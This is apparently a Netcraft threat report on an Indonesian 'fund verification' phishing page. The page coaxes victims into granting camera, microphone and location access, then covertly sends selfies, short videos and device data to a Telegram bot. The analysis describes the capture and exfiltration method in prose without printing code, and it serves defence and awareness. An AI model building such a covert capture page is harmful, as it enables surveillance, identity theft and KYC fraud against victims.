Executive Summary
Netcraft has identified a card payment-themed phishing page that appears to go beyond conventional credential theft. Instead of asking victims to enter card details, the page attempts to persuade them to grant access to their camera, microphone, location, and device information under the guise of “fund verification”. This makes the campaign an example of camera-first phishing: a social engineering attack where browser permissions, rather than typed credentials, become the primary collection channel.
The lure is simple: the victim is told that Rp 1,000,000 is ready to be received from a sender named WILDAN, with the page styled to resemble a card payment verification flow.
Figure 1. Bank transfer page.
The page uses Indonesian-language messaging such as “Verifikasi Visa Secure”, “Penerimaan Dana”, and “Data wajah + lokasi digunakan untuk keamanan transaksi” to make camera and location prompts appear like part of a legitimate security process. The observed page also displays fake confirmation buttons and status messages referencing camera, geolocation, IP address, and device checks.
A Phishing Page That Asks for Your Face, Not Your Password
Many phishing attacks are designed to steal credentials, payment card numbers, or one-time passcodes. This campaign appears to use a different playbook. Netcraft’s analysis indicates that the operator is primarily interested in live facial images, short videos, GPS location, IP address, and device metadata.
One observed variant attempts to activate the victim’s front-facing camera as soon as the page loads. If permission is granted, the page hides the video feed from the user, draws frames from the live camera stream onto a hidden canvas, converts those frames into JPEG images, and sends them to a Telegram bot.
Figure 2. Webcam frame capture and Telegram sendPhoto.
The process repeats every two seconds. The same page also attempts to watch the victim’s location, collect public IP address data, and capture browser and device information such as the user-agent and platform.
Figure 3. getUserMedia() and automatic capture every 2 seconds.
A second observed variant is even more invasive. After the victim clicks a “CAIRKAN DANA” button, the page requests high-resolution front-camera access and audio.
Figure 4. CAIRKAN DANA button.
It then captures 20 still images and records 10 short video clips, each lasting around five seconds, before uploading them through Telegram’s API.
Figure 5. Captures 20 JPEG images followed by 10 short video recordings.
Netcraft also observed code that changes the page background between white and grey before capturing images. The attacker labels this as a “strobe flash” and “warm-up” routine. It may be intended to improve lighting or camera focus, although it could also be a theatrical effect designed to make the fake biometric process feel more convincing to the victim.
Browser Permissions Are the Attack Surface
The campaign does not appear to exploit a browser vulnerability. Instead, it abuses legitimate browser APIs and relies on social engineering to obtain consent.
The getUserMedia() API prompts users for permission to access media inputs such as cameras and microphones, while the Geolocation API requires explicit permission before returning location data. In legitimate applications, these features support video calls, identity checks, maps, delivery services, and other useful functionality. In this campaign, the same features are wrapped in a fake Visa Secure experience and repurposed for data collection.
Why Would Fraudsters Collect Selfies and Videos?
The operator’s precise intent is uncertain, but the most likely explanation is identity material harvesting. A stolen password can be reset. A stolen card can be cancelled. A collection of facial images, short videos, location data, and device information is harder for victims to recover from. This material may be useful for social engineering, impersonation, account recovery fraud, extortion, or attempts to defeat weaker identity verification checks.
Many financial institutions and identity providers use liveness detection, device attestation, server-side risk scoring, and fraud analytics. However, public reporting shows why criminals value this type of material. FinCEN has warned that financial institutions have observed suspicious activity involving suspected deepfake media, including fraudulent identity documents, photographs, and videos used to circumvent verification and authentication methods. Netcraft has also observed underground markets for photos and videos used to support KYC bypass attempts.
Telegram as the Exfiltration Channel
Netcraft observed Telegram being used as the delivery mechanism for captured data. This is a common choice in lightweight phishing kits because it removes the need for the attacker to operate a traditional backend. The phishing page can send stolen data directly from the victim’s browser to Telegram using hardcoded bot tokens and chat IDs.
We have previously reported on PHP-less phishing kits that can run on any website, including kits that transmit stolen credentials to Telegram directly from client-side JavaScript. In those cases, the Telegram API key and chat ID are exposed in the page source, making them easy to identify and report. The same operational weakness is visible here: embedding Telegram credentials in client-side JavaScript is convenient for the criminal, but it also creates an opportunity for disruption.
